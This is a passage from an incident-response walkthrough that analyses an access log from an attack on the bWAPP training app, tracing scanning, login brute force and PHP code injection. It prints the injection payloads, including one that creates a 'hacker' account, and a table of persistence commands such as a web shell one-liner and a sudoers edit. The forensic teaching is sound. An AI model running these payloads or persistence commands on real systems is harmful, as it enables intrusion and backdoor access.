grep "Firefox/52.0" attacker_traffic.log | head -1 | awk '{print $4, $5}'
grep "Firefox/52.0" attacker_traffic.log | tail -1 | awk '{print $4, $5}'
This log — confirmed timeline:
Phase 1 Nikto Start: 12:36:24 End: 12:36:57 Duration: 33 seconds
Phase 2 Dirb Start: 12:37:50 End: 12:38:02 Duration: ~12 seconds
[GAP] 12:38:02 → 12:41:34 Duration: 3 min 32 sec
Phase 3+ Firefox Start: 12:41:34 End: 12:53:23 Duration: 11 min 49 sec
Interpreting the 3 min 32 sec gap:
The attacker stopped all automated tooling after Dirb finished and went quiet for over three minutes. The most plausible reading is that the attacker was manually reviewing Dirb’s output, identifying the login page (/bWAPP/login.php), and setting up the next tool. A pause of this length after enumeration is consistent with a human operator making decisions between stages, not a script running on autopilot.
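Quiet periods like this one can be located automatically by comparing each request's timestamp with the previous one. The sketch below runs on four hypothetical lines built around the boundary times reported above, and assumes all entries fall on the same day.

```shell
tmp=$(mktemp)
cat > "$tmp" <<'EOF'
10.0.0.9 - - [20/Jun/2021:12:38:01 +0300] "GET /bwapp/a HTTP/1.1" 404 300 "-" "ua"
10.0.0.9 - - [20/Jun/2021:12:38:02 +0300] "GET /bwapp/b HTTP/1.1" 404 300 "-" "ua"
10.0.0.9 - - [20/Jun/2021:12:41:34 +0300] "GET /bWAPP/login.php HTTP/1.1" 200 4086 "-" "ua"
10.0.0.9 - - [20/Jun/2021:12:41:36 +0300] "GET /bWAPP/portal.php HTTP/1.1" 200 4086 "-" "ua"
EOF

# Track the largest gap (in seconds) between consecutive requests.
largest=$(awk '
{
    split($4, t, ":")                      # t[2]=HH, t[3]=MM, t[4]=SS
    now = t[2] * 3600 + t[3] * 60 + t[4]
    if (NR > 1 && now - prev > gap) { gap = now - prev; from = prev_ts; to = $4 }
    prev = now; prev_ts = $4
}
END { printf "%d %s %s\n", gap, substr(from, 2), substr(to, 2) }' "$tmp")

echo "largest gap (seconds, from, to): $largest"
rm -f "$tmp"
```

A gap of 212 seconds corresponds to the 3 min 32 sec pause between the end of the Dirb phase and the first manual request.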
STEP 10 — Construct the complete timeline table
Fill this in before proceeding. This table is your roadmap for all remaining analysis:
PHASE TOOL UA FINGERPRINT START END DURATION
------ ----------- ----------------------- -------- -------- ----------
Phase 1 Nikto Nikto/2.1.6 12:36:24 12:36:57 33 seconds
Phase 2 Dirb MSIE 6.0 / Windows NT 12:37:50 12:38:02 ~12 seconds
[ATTACKER ANALYSIS GAP] 12:38:02 12:41:34 3.5 minutes
Phase 3 Unknown Firefox/52.0 Linux 12:41:34 12:49:35 ~8 minutes
Phase 4 Unknown Firefox/52.0 Linux 12:50:15 12:53:23 ~3 minutes
Phases 3 and 4 share the same User-Agent because they are both manual operations by the attacker using their own browser. They are distinguished by target endpoint and behavior, not by tool change.
PHASE 5 — IDENTIFY THE THIRD ATTACK TYPE
Profile Phase 3 to answer Q3
STEP 11 — Isolate Phase 3 and Phase 4 traffic into a dedicated file
Why: You need a clean, isolated view of the manual phase activity, free from Nikto and Dirb noise. All injection and brute force analysis from this point targets this file.
# Isolate all manual-phase traffic (Firefox/52.0 UA)
grep "Firefox/52.0" attacker_traffic.log > phase3_traffic.log
# Confirm line count
wc -l phase3_traffic.log
# View complete Phase 3+ activity in chronological order
awk '{print $4, $6, $7, $9, $10}' phase3_traffic.log
This log — confirmed results:
174 lines in phase3_traffic.log
STEP 12 — Identify HTTP methods used in the manual phase
Why: HTTP method is the highest-signal behavioral indicator at this stage. Switching from the GET-dominant scanning of Phases 1 and 2 to heavy POST activity on a specific endpoint is a direct indicator of credential-based attack. The method ratio shapes your initial hypothesis.
# Method distribution for the entire manual phase
awk '{print $6}' phase3_traffic.log | sort | uniq -c
Interpretation framework:
| Method Pattern | Likely Attack Type |
|---|---|
| GET-dominant with varied endpoints | Browsing or manual recon |
| POST-dominant against one endpoint | Brute force or form injection |
| GET with long URL parameters | Code/command injection via URL |
| Mixed POST heavy early, GET with params late | Brute force then post-login injection |
This log — confirmed results:
39 "GET (browsing: page loading, asset requests, navigation)
135 "POST (dominant — data submission to server)
135 POST requests vs 39 GET requests. The dominant action is submitting data. This rules out passive recon and points directly toward active exploitation.
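The leading quote in `"GET` and `"POST` is a side effect of space splitting. A quote-delimited variant yields clean method names; the sketch below shows it on a hypothetical four-line sample.

```shell
tmp=$(mktemp)
cat > "$tmp" <<'EOF'
10.0.0.9 - - [20/Jun/2021:12:44:00 +0300] "POST /bWAPP/login.php HTTP/1.1" 200 4086 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0)"
10.0.0.9 - - [20/Jun/2021:12:44:05 +0300] "POST /bWAPP/login.php HTTP/1.1" 200 4086 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0)"
10.0.0.9 - - [20/Jun/2021:12:44:10 +0300] "POST /bWAPP/login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0)"
10.0.0.9 - - [20/Jun/2021:12:44:11 +0300] "GET /bWAPP/portal.php HTTP/1.1" 200 4086 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0)"
EOF

# Field 2 of the quote-split line is the request line; its first word is the method.
methods=$(awk -F'"' '{split($2, req, " "); print req[1]}' "$tmp" |
          sort | uniq -c | sort -rn | awk '{print $1, $2}')

printf '%s\n' "$methods"
rm -f "$tmp"
```

The trailing `awk '{print $1, $2}'` only normalizes the padding that `uniq -c` adds, which makes the output easier to compare across systems.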
STEP 13 — Map all endpoints targeted in the manual phase
Why: Endpoint concentration is the definitive differentiator between attack types. A brute force attack drills one single endpoint repeatedly. A scanner distributes requests across hundreds of different paths. The distribution shape identifies the attack type.
# All method + endpoint combinations with counts, sorted by volume
awk '{print $6, $7}' phase3_traffic.log | sort | uniq -c | sort -rn
Reading the distribution:
| Concentration | Attack Type |
|---|---|
| Single endpoint > 70% of traffic | Brute force — intense repetition on one target |
| Hundreds of paths mostly 404 | Directory/file brute force |
| One endpoint, varying parameters | Parameter injection |
| Spread across many authenticated pages | Post-login manual exploration |
This log — confirmed results:
134 "POST /bWAPP/login.php ← 77% of ALL 174 Phase 3 requests — one endpoint
2 "GET /bWAPP/portal.php
2 "GET /bWAPP/phpi.php?message=test
2 "GET ...phpi.php?message=...(encoded commands)
1 "POST /bWAPP/portal.php
(remaining 33: image/CSS/JS assets loaded when navigating the portal)
134 of 174 requests — 77% — concentrated on a single endpoint. This is the unmistakable shape of brute force.
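The concentration check can also be written as a small calculation. The following is a minimal Python sketch, not part of the lab tooling: top_endpoint_share is a hypothetical helper, and the sample data only re-creates the counts reported above. The 33 asset requests and the encoded payload requests are collapsed into placeholder paths because their individual paths are not listed here.

```python
from collections import Counter


def top_endpoint_share(requests):
    """Return (endpoint, count, share) for the most-requested (method, path) pair.

    requests: iterable of (method, path) tuples.
    """
    counts = Counter(requests)
    total = sum(counts.values())
    if total == 0:
        return None, 0, 0.0
    endpoint, count = counts.most_common(1)[0]
    return endpoint, count, count / total


# Counts copied from the confirmed results; placeholder paths are assumptions.
sample = (
    [("POST", "/bWAPP/login.php")] * 134
    + [("GET", "/bWAPP/portal.php")] * 2
    + [("GET", "/bWAPP/phpi.php?message=test")] * 2
    + [("GET", "<phpi.php encoded payloads>")] * 2
    + [("POST", "/bWAPP/portal.php")] * 1
    + [("GET", "<static assets>")] * 33
)

endpoint, count, share = top_endpoint_share(sample)
print(endpoint, count, f"{share:.0%}")
```

With these counts the helper reports 134 of 174 requests on the login endpoint, which is above the 70% line used in the table above.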
STEP 14 — Confirm the brute force pattern through response code and body size analysis
Why: The server’s HTTP responses are ground truth. For login brute force the pattern is specific and inescapable: hundreds of identical failure responses followed by one success response with a completely different code and body. The body size column is the clearest evidence because it proves every one of those 132 responses was the same login-failure page.
# Response code distribution for all login POST requests
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9}' | sort | uniq -c
# Response CODE + BODY SIZE together — the definitive brute force fingerprint
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9, $10}' | sort | uniq -c
# Total login attempt count
grep "POST /bWAPP/login.php" attacker_traffic.log | wc -l
# Timing of attempts — proves automation (human cannot type at this speed)
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $4}' | head -15
HTTP response reference for login pages:
| Code | Body | Meaning |
|---|---|---|
| 200 | Uniform size repeated | Failed login — same page returned every time |
| 302 | - (no body) | Successful login — server redirected to authenticated area |
| 403 | Present | IP or account blocked |
| 429 | Present | Rate limit triggered |
This log — confirmed results:
132 200 4086 ← 132 failed logins: identical login-failure page (4086 bytes) every time
2 302 - ← 2 successful logins: redirect with no body = credentials found
Total: 134 attempts
Timing sample:
12:44:xx → 12:45:xx → 12:46:xx (regular ~4-5 second intervals = automated tool)
The 4086 pattern explained: The number 4086 is the exact byte size of the login-failure HTML page. When login fails, the server renders the same form with the same error message: same HTML, same size, every time. Seeing this size 132 times with zero variation shows that every one of those attempts received an identical failed-login response.
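The status-plus-size fingerprint can be summarised programmatically. This is a hedged Python sketch under stated assumptions: login_fingerprint is a hypothetical helper, the min_failures threshold of 20 is an arbitrary illustration rather than a recommended value, and the observed list simply re-creates the 132 and 2 counts confirmed above.

```python
from collections import Counter


def login_fingerprint(responses, min_failures=20):
    """Summarise (status, size) pairs for POSTs to a login endpoint.

    responses: iterable of (status, size) string tuples, e.g. ("200", "4086").
    min_failures: assumed threshold for calling the pattern brute force.
    """
    counts = Counter(responses)
    redirects = sum(n for (status, _), n in counts.items() if status == "302")
    # Most frequent HTTP 200 response size: the repeated failure page.
    failures = [(n, size) for (status, size), n in counts.items() if status == "200"]
    fail_count, fail_size = max(failures, default=(0, None))
    brute_force = fail_count >= min_failures
    return {
        "attempts": sum(counts.values()),
        "dominant_failure_size": fail_size,
        "dominant_failure_count": fail_count,
        "redirects": redirects,
        "looks_like_brute_force": brute_force,
        "likely_succeeded": brute_force and redirects > 0,
    }


# Re-creates the confirmed results: 132 x "200 4086" and 2 x "302 -".
observed = [("200", "4086")] * 132 + [("302", "-")] * 2
print(login_fingerprint(observed))
```

The pairs could be fed from the awk '{print $9, $10}' output shown earlier; the summary is only a triage aid and does not replace reading the raw lines.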
Q3 ANSWER: Brute force
PHASE 6 — CONFIRM WHETHER THE BRUTE FORCE SUCCEEDED
Answer Q4
STEP 15 — Isolate successful authentication events
Why: Whether the attack succeeded changes everything about the incident response. A failed attack requires detection tuning. A successful one requires active containment. The HTTP 302 redirect on a login endpoint is the server’s way of saying “credentials accepted, go here now.”
# Isolate ONLY the successful login redirects
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 "
# Count how many successful logins occurred
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 " | wc -l
# Exact timestamp of first successful login
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 " | head -1 | awk '{print $4, $5}'
This log — confirmed results:
192.168.199.2 - - [20/Jun/2021:12:49:35 +0300] "POST /bWAPP/login.php HTTP/1.1" 302 - ... Firefox/52.0
192.168.199.2 - - [20/Jun/2021:12:50:10 +0300] "POST /bWAPP/login.php HTTP/1.1" 302 - ... Firefox/52.0
2 successful logins
First breach timestamp: 12:49:35
STEP 16 — Confirm authenticated access was established (post-login navigation)
Why: A 302 on a login page is strong evidence of success, but you must also verify the attacker reached and loaded the authenticated area. If portal.php returned HTTP 200 with a full body, the attacker is definitively inside the application.
# What did the attacker load immediately after the 302 redirect?
grep "Firefox/52.0" attacker_traffic.log | grep -A5 "POST /bWAPP/login.php.*302"
# Did the attacker reach the authenticated portal?
grep "Firefox/52.0" attacker_traffic.log | grep "portal.php"
This log — confirmed results:
12:49:35 POST /bWAPP/login.php 302 - (success — redirect issued)
12:50:10 POST /bWAPP/login.php 302 - (second successful login)
12:50:10 GET /bWAPP/portal.php 200 23369 (authenticated portal loaded — 23,369 bytes)
12:50:15 POST /bWAPP/portal.php 302 23369 (navigating within authenticated area)
12:50:15 GET /bWAPP/phpi.php 200 12735 (selected vulnerable page from portal menu)
The portal returned HTTP 200 with 23,369 bytes — a full page load, not an error or redirect. The attacker is inside.
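The "302 on login, then 200 on the portal" check is a simple sequence test. The sketch below is one way to express it in Python, assuming the events have already been parsed into (time, method, path, status) tuples. confirm_session is a hypothetical helper, and the event list re-uses the five entries shown above.

```python
def confirm_session(events, login="/bWAPP/login.php", landing="/bWAPP/portal.php"):
    """Return (login_time, landing_time) if a 302 on the login page is later
    followed by a 200 on the landing page; otherwise return None.

    events: chronological list of (time, method, path, status) tuples.
    """
    login_time = None
    for time, method, path, status in events:
        if login_time is None:
            # Look for the first accepted login (redirect).
            if method == "POST" and path == login and status == "302":
                login_time = time
        elif method == "GET" and path == landing and status == "200":
            # Authenticated landing page was actually loaded.
            return login_time, time
    return None


events = [
    ("12:49:35", "POST", "/bWAPP/login.php", "302"),
    ("12:50:10", "POST", "/bWAPP/login.php", "302"),
    ("12:50:10", "GET", "/bWAPP/portal.php", "200"),
    ("12:50:15", "POST", "/bWAPP/portal.php", "302"),
    ("12:50:15", "GET", "/bWAPP/phpi.php", "200"),
]
print(confirm_session(events))
```

A None result would mean the redirect was issued but the authenticated page was never loaded, which would weaken the conclusion that the attacker got inside.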
Q4 ANSWER: Yes
PHASE 7 — IDENTIFY THE FOURTH ATTACK
Profile post-login exploitation to answer Q5 and Q6
STEP 17 — Map all post-login activity
Why: After gaining access the attacker’s behavior changes completely. They stop repeating the same request and start navigating. What they navigate to, and what parameters they pass, reveals both the fourth attack type and the specific exploitation technique.
# Full chronological view of all activity after the successful login
grep "Firefox/52.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | tail -20
# All unique post-login endpoints (excluding login.php)
grep "Firefox/52.0" attacker_traffic.log | grep -v "login.php" | awk '{print $6, $7}' | sort | uniq -c | sort -rn
This log — post-login activity sequence:
12:50:10 GET /bWAPP/portal.php 200 (landing page after login)
12:50:15 POST /bWAPP/portal.php 302 (selecting a vulnerability from the menu)
12:50:15 GET /bWAPP/phpi.php 200 (opened PHP Injection page)
12:50:17 GET /bWAPP/phpi.php?message=test 200 (tested the parameter)
12:51:37 GET /bWAPP/phpi.php?message=test 200 (tested again — confirming it works)
12:52:36 GET /bWAPP/phpi.php?message=%22%22;... 200 (INJECTION PAYLOAD 1)
12:52:46 GET /bWAPP/phpi.php?message=%22%22;... 200 (INJECTION PAYLOAD 2)
12:52:56 GET /bWAPP/phpi.php?message=%22%22;... 200 (INJECTION PAYLOAD 3)
12:53:13 GET /bWAPP/phpi.php?message=%22%22;... 200 (INJECTION PAYLOAD 4)
12:53:23 GET /bWAPP/phpi.php?message=%22%22;... 200 (INJECTION PAYLOAD 4 repeated)
The attacker’s methodology visible in this sequence:
1. Land on portal, select a vulnerability category
2. Open the vulnerable page (phpi.php = PHP Injection page)
3. Test with benign input (message=test) twice to confirm the parameter is processed
4. Begin injecting OS commands once confident the parameter is vulnerable
This is systematic, professional reconnaissance-then-exploit behavior — not guessing.
STEP 18 — Identify the attack type from the endpoint and parameter pattern
Why: The endpoint name phpi.php (PHP Injection) and the pattern of the message parameter accepting and apparently executing arbitrary content points to one specific attack category. Confirming this requires looking at the parameter values — even URL-encoded, certain characters are recognizable as injection syntax.
# Extract all raw URL-encoded payloads sent to the injection endpoint
grep "phpi.php" attacker_traffic.log | awk '{print $7}'
# With timestamps to show execution sequence
grep "phpi.php" attacker_traffic.log | awk '{print $4, $7}'
# Check what response body sizes were returned — changing sizes prove dynamic execution
grep "phpi.php" attacker_traffic.log | awk '{print $4, $9, $10}'
This log — confirmed raw payloads:
12:50:15 /bWAPP/phpi.php (no param — baseline)
12:50:17 /bWAPP/phpi.php?message=test (benign test)
12:51:37 /bWAPP/phpi.php?message=test (benign test repeated)
12:52:36 /bWAPP/phpi.php?message=%22%22;%20system(%27whoami%27) (PAYLOAD 1)
12:52:46 /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%27) (PAYLOAD 2)
12:52:56 /bWAPP/phpi.php?message=%22%22;%20system(%27net%20share%27) (PAYLOAD 3)
12:53:13 /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27) (PAYLOAD 4)
12:53:23 /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27) (PAYLOAD 4 repeat)
Even before full decoding, the URL-encoded strings reveal:
- %22%22 = "" — empty string used to break PHP string context
- %3B or ; — semicolon separating PHP statements
- system( — PHP function that executes OS shell commands
- %27 — single quotes wrapping OS commands passed to system()
Response body sizes from the injection requests:
12:50:15 200 12735 (baseline page — no payload)
12:50:17 200 12759 (message=test — 24 bytes larger than baseline)
12:52:36 200 12778 (whoami payload — different size = dynamic output returned)
12:52:46 200 13045 (net user — much larger = command output returned in response)
12:52:56 200 13175 (net share — larger still = share list returned)
12:53:13 200 12755 (net user /add — smaller = brief success/failure message)
The changing body sizes are strong evidence of execution: each injection returns a different body size, which is consistent with the server including the OS command output in the response HTML. A page that did not process the parameter would return the same body size on every request.
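The size comparison is easier to read as deltas against the baseline. This short Python sketch only re-computes the arithmetic from the sizes listed above; size_deltas is a hypothetical helper and the labels are shorthand for the requests.

```python
BASELINE_SIZE = 12735  # phpi.php with no message parameter

# Body sizes copied from the response list above.
observed_sizes = {
    "message=test": 12759,
    "whoami": 12778,
    "net user": 13045,
    "net share": 13175,
    "net user /add": 12755,
}


def size_deltas(baseline, sizes):
    """Return how many bytes each response differs from the baseline page."""
    return {label: size - baseline for label, size in sizes.items()}


deltas = size_deltas(BASELINE_SIZE, observed_sizes)
for label, delta in sorted(deltas.items(), key=lambda item: item[1], reverse=True):
    print(f"{label:<15} {delta:+d} bytes vs baseline")
```

The two enumeration commands stand out with the largest deltas, which fits the reading that their output was returned in the page. The deltas show that the response changed, not what the output contained.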
Q5 ANSWER: Code Injection
(Full technical classification: PHP Code Injection executing OS commands via system())
STEP 19 — Decode all payloads
Why: URL-encoded payloads must be fully decoded to understand what OS commands were executed on the victim system. This is non-negotiable for the incident report.
# Decode Payload 1
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27whoami%27)'))
HEREDOC
# Decode Payload 2
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%27)'))
HEREDOC
# Decode Payload 3
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20share%27)'))
HEREDOC
# Decode Payload 4 (the persistence payload)
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)'))
HEREDOC
Alternative — decode all payloads with full context directly from the log:
grep "phpi.php" attacker_traffic.log | \
awk '{print $4, $5, $9, $10, $7}' | \
python3 -c "
import sys, urllib.parse
for line in sys.stdin:
    p = line.strip().split()
    print(p[0], p[1], p[2], p[3], urllib.parse.unquote(p[4]))"
This command outputs each payload with its timestamp, timezone, HTTP status code, and body size alongside the decoded URL — giving full investigative context in a single pass.
URL encoding reference:
| Encoded | Decoded | Role in injection |
|---|---|---|
| %22 | " | Double quote — breaks out of PHP string context |
| %3B or ; | ; | Semicolon — chains PHP statements |
| %20 | (space) | Space — separates command and arguments |
| %27 | ' | Single quote — wraps OS command passed to system() |
| %2F | / | Forward slash — used in command flags like /add |
Decoded payload table — complete:
| # | Timestamp | Decoded Payload | OS Command | Purpose |
|---|---|---|---|---|
| 1 | 12:52:36 | ""; system('whoami') | whoami | Identify the OS user running the web server |
| 2 | 12:52:46 | ""; system('net user') | net user | List all local user accounts on the system |
| 3 | 12:52:56 | ""; system('net share') | net share | Map all network shares accessible from this machine |
| 4 | 12:53:13 | ""; system('net user hacker Asd123!! /add') | net user hacker Asd123!! /add | Create backdoor account |
| 4 | 12:53:23 | (Payload 4 repeated) | (same) | Confirmation execution |
Injection mechanism — how ""; system('COMMAND') works:
The phpi.php page takes user input via the message parameter and evaluates it as PHP code. The attacker’s injection string exploits this directly:
"" → Empty string satisfies the PHP expression parser
; → Ends the current PHP statement
system('X') → Calls PHP's built-in system() function
system() passes its argument to the OS shell and captures stdout
The output is embedded in the HTTP response body
This is why the response body sizes changed with each command — the server was including actual OS command output in the HTML page returned to the attacker.
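Once the injection structure is understood, the OS command can be pulled out of each payload automatically. The following is a minimal Python sketch, assuming the payload follows the system('COMMAND') shape seen in this log. extract_os_command and the SYSTEM_CALL pattern are hypothetical names, and the regex would need extending for other PHP functions such as exec() or passthru().

```python
import re
from urllib.parse import unquote

# Matches system('...') or system("...") and captures the quoted argument.
SYSTEM_CALL = re.compile(r"system\(\s*(['\"])(.*?)\1\s*\)")


def extract_os_command(raw_value):
    """Decode a URL-encoded parameter value and return the system() argument,
    or None if the value contains no system() call."""
    decoded = unquote(raw_value)
    match = SYSTEM_CALL.search(decoded)
    return match.group(2) if match else None


payloads = [
    "test",
    "%22%22;%20system(%27whoami%27)",
    "%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)",
]
for raw in payloads:
    print(repr(raw), "->", extract_os_command(raw))
```

The benign message=test probe yields None, while the injected values yield the bare OS command, which is the form needed for the incident report.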
Q6 ANSWER: whoami
(The first payload injected was system('whoami'), which decodes from %22%22;%20system(%27whoami%27))
PHASE 8 — PERSISTENCE INVESTIGATION
Determine if the attacker planted a persistent foothold — answers Q7
STEP 20 — Understand persistence in the context of web logs
Why: Persistence means the attacker created something that survives beyond the current session — a mechanism to re-enter the system even after the web vulnerability is patched, the session expires, or the machine is rebooted. Web logs record the HTTP requests that triggered these actions. Detecting persistence from logs means identifying OS commands that create lasting artifacts.
Persistence indicators by category:
| Category | OS Command | What it creates |
|---|---|---|
| Account creation (Windows) | net user USERNAME PASS /add | New local user account |
| Privilege escalation (Windows) | net localgroup administrators USERNAME /add | Adds user to admin group |
| Account creation (Linux) | useradd USERNAME or adduser USERNAME | New local user account |
| Sudo access (Linux) | echo 'user ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers | Passwordless sudo |
| Web shell (both) | echo "<?php system($_GET['c']); ?>" > shell.php | Backdoor script on web server |
| Scheduled task (Windows) | schtasks /create /tn ... | Recurring execution |
| Cron job (Linux) | crontab -e or echo ... \| crontab | Recurring execution |
| Registry run key (Windows) | reg add HKLM\...\Run /v name /d command | Execute on every boot |
| File download (both) | wget http://... -O filename or curl ... -o filename | Fetch remote payload |
STEP 21 — The correct persistence search method
Why this method is required: All attack payloads in an access log are stored in their URL-encoded form. When an attacker injects net user hacker Asd123!! /add through a URL parameter, the log records it as net%20user%20hacker%20Asd123!!%20/add — with spaces encoded as %20. Searching for plaintext terms such as net user or useradd directly against the raw log will return no results because those exact strings do not exist in the file as written. Every persistence search must account for URL encoding or first decode the payloads before searching.
What this achieves: By using URL-encoded search patterns or working against decoded output, you accurately detect all persistence-related commands the attacker may have injected — including account creation, privilege escalation, scheduled tasks, web shell planting, file downloads, and registry modifications — regardless of how they were encoded in transit.
Variation A — search for URL-encoded patterns directly in the log:
# Windows account creation — net user with /add flag
grep "phpi.php" attacker_traffic.log | grep -i "net%20user.*add"
# Validate with the exact known pattern
grep "net%20user%20hacker" attacker_traffic.log
# Linux account creation
grep "phpi.php" attacker_traffic.log | grep -i "useradd\|adduser\|user%20add"
# Privilege escalation via group membership
grep "phpi.php" attacker_traffic.log | grep -i "localgroup\|sudoers\|sudo"
# File writing — web shell creation
grep "phpi.php" attacker_traffic.log | grep -i "echo.*php\|echo.*shell\|echo.*cmd"
# File download
grep "phpi.php" attacker_traffic.log | grep -i "wget\|curl%20\|curl+"
# Scheduled persistence
grep "phpi.php" attacker_traffic.log | grep -i "schtask\|crontab\|at%20"
# Registry persistence
grep "phpi.php" attacker_traffic.log | grep -i "reg%20add\|HKLM\|HKCU"
Variation B — decode all payloads first, then search the decoded output:
# Extract and decode all phpi.php parameters, save to a decoded file
grep "phpi.php" attacker_traffic.log | awk '{print $7}' | python3 -c "
import sys, urllib.parse
for line in sys.stdin:
    print(urllib.parse.unquote(line.strip()))
" > decoded_payloads.log
# View all decoded payloads
cat decoded_payloads.log
# Search decoded output using plaintext terms — all persistence categories
grep -i "net user.*add\|useradd\|adduser" decoded_payloads.log
grep -i "localgroup\|administrators\|sudo" decoded_payloads.log
grep -i "echo.*php\|shell\|webshell" decoded_payloads.log
grep -i "wget\|curl" decoded_payloads.log
grep -i "schtasks\|crontab\|cron" decoded_payloads.log
grep -i "reg add\|registry" decoded_payloads.log
Why Variation B is superior for complex investigations:
Searching decoded text eliminates the need to manually translate every persistence indicator into its URL-encoded form. In logs with many payloads or novel encoding, decoding first and searching second is more reliable and catches edge cases.
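The decode-first approach can be folded into a single pass that labels each payload by persistence category. This is an illustrative Python sketch, not a complete detection set: classify and PERSISTENCE_PATTERNS are hypothetical names, and the regular expressions are assumptions that loosely mirror the grep terms above.

```python
import re
from urllib.parse import unquote

# Assumed patterns, loosely mirroring the plaintext grep searches above.
PERSISTENCE_PATTERNS = {
    "account creation": re.compile(r"net\s+user\b.*\s/add\b|\buseradd\b|\badduser\b", re.I),
    "privilege escalation": re.compile(r"\blocalgroup\b|\bsudoers\b", re.I),
    "web shell": re.compile(r"echo\b.*<\?php", re.I),
    "file download": re.compile(r"\bwget\b|\bcurl\b", re.I),
    "scheduled execution": re.compile(r"\bschtasks\b|\bcrontab\b", re.I),
    "registry run key": re.compile(r"\breg\s+add\b", re.I),
}


def classify(raw_value):
    """Decode a URL-encoded payload and return the matching category names."""
    decoded = unquote(raw_value)
    return [name for name, pattern in PERSISTENCE_PATTERNS.items()
            if pattern.search(decoded)]


payloads = [
    "%22%22;%20system(%27whoami%27)",
    "%22%22;%20system(%27net%20user%27)",
    "%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)",
]
for raw in payloads:
    print(unquote(raw), "->", classify(raw) or "no persistence indicator")
```

Requiring the /add flag keeps the plain net user enumeration command out of the account creation bucket, so only the payload that actually creates an account is flagged.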
STEP 22 — Execute the persistence search and identify the payload
# PRIMARY SEARCH — Windows account creation via net user
grep "phpi.php" attacker_traffic.log | grep -i "net%20user.*add"
This log — confirmed results:
192.168.199.2 - - [20/Jun/2021:12:53:13 +0300] "GET /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27) HTTP/1.1" 200 12755 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
192.168.199.2 - - [20/Jun/2021:12:53:23 +0300] "GET /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27) HTTP/1.1" 200 12755 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
All other persistence categories return no results — confirmed absent:
| Search | Result | Conclusion |
|---|---|---|
| grep -i "useradd\|adduser" | No output | No Linux user creation attempted |
| grep -i "localgroup\|sudoers" | No output | No privilege escalation in injection phase |
| grep -i "echo.*php\|wget\|curl" | No output | No web shell or file download attempted |
| grep -i "schtask\|crontab" | No output | No scheduled task created |
| grep -i "reg%20add\|HKLM" | No output | No registry modification attempted |
Important scoping note: Running grep "localgroup\|administrators" against the full attacker_traffic.log without the phpi.php filter returns results — but they are Nikto and Dirb scanning probes like GET /bwapp/administrators/ 404 and GET /bwapp/_vti_pvt/administrators.pwd 404. These are reconnaissance requests, not injected commands. Always scope persistence searches to the injection endpoint (phpi.php) to prevent false positives from earlier scanning phases.
STEP 23 — Extract and document the persistence payload precisely
Why: The incident report and containment response require the exact payload in the exact format it appeared in the log. Additionally, confirming the payload executed successfully (HTTP 200 with consistent body size) establishes that the backdoor account was likely created on the victim system.
# Confirm the payload and its HTTP response
grep "net%20user%20hacker" attacker_traffic.log
# Verify the server returned HTTP 200 (payload was processed)
grep "net%20user%20hacker" attacker_traffic.log | awk '{print $9, $10}'
# Decode the persistence payload
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)'))
HEREDOC
This log — confirmed results:
Response codes: 200 12755 (both executions)
200 12755 (identical body sizes)
Decoded payload: ""; system('net user hacker Asd123!! /add')
Why both executions returned body size 12755:
The net user ... /add command produces a brief text output (“The command completed successfully.” or similar). Both executions returned the same body size, which shows the server returned the same response to both requests. Body size alone cannot confirm the outcome: on Windows, repeating /add for an account that already exists normally returns an error rather than a second success message. Treat the log as strong evidence that the command was processed, and confirm the account on the host itself (for example with net user hacker).
Why it was executed twice:
When injecting commands through a web application without direct terminal access, the attacker cannot see stderr or confirm execution status. Re-running the same persistence command 10 seconds later is a common way to make sure it ran. The identical response sizes suggest the server handled both requests the same way.
Operational impact:
net user hacker Asd123!! /add creates a local Windows user account named hacker with password Asd123!!. This account:
- Persists across reboots
- Persists after the web application vulnerability is patched
- Can be used for direct login via RDP (port 3389), SMB (port 445), or any service accepting local Windows credentials
- Provides re-entry to the victim machine independent of the web application
STEP 24 — Record the persistence payload in both formats
Why: The forensically precise representation of the payload is the raw URL-encoded inner command exactly as it appears in the log — this is what was transmitted over the network and what constitutes the evidence in the log file.
Raw URL-encoded persistence payload (as it appears in the log):
%27net%20user%20hacker%20Asd123!!%20/add%27
Breaking down this exact string:
%27 → ' (opening single quote)
net → net (literal — not encoded)
%20 → (space)
user → user (literal)
%20 → (space)
hacker → hacker (literal)
%20 → (space)
Asd123!! → Asd123!! (literal — the !! is NOT URL-encoded in the log)
%20 → (space)
/add → /add (literal — the / is NOT URL-encoded in the log)
%27 → ' (closing single quote)
Complete URL parameter as it appears in the log:
/bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)
Q7 ANSWER: Yes — persistence was established.
Related payload: %27net%20user%20hacker%20Asd123!!%20/add%27
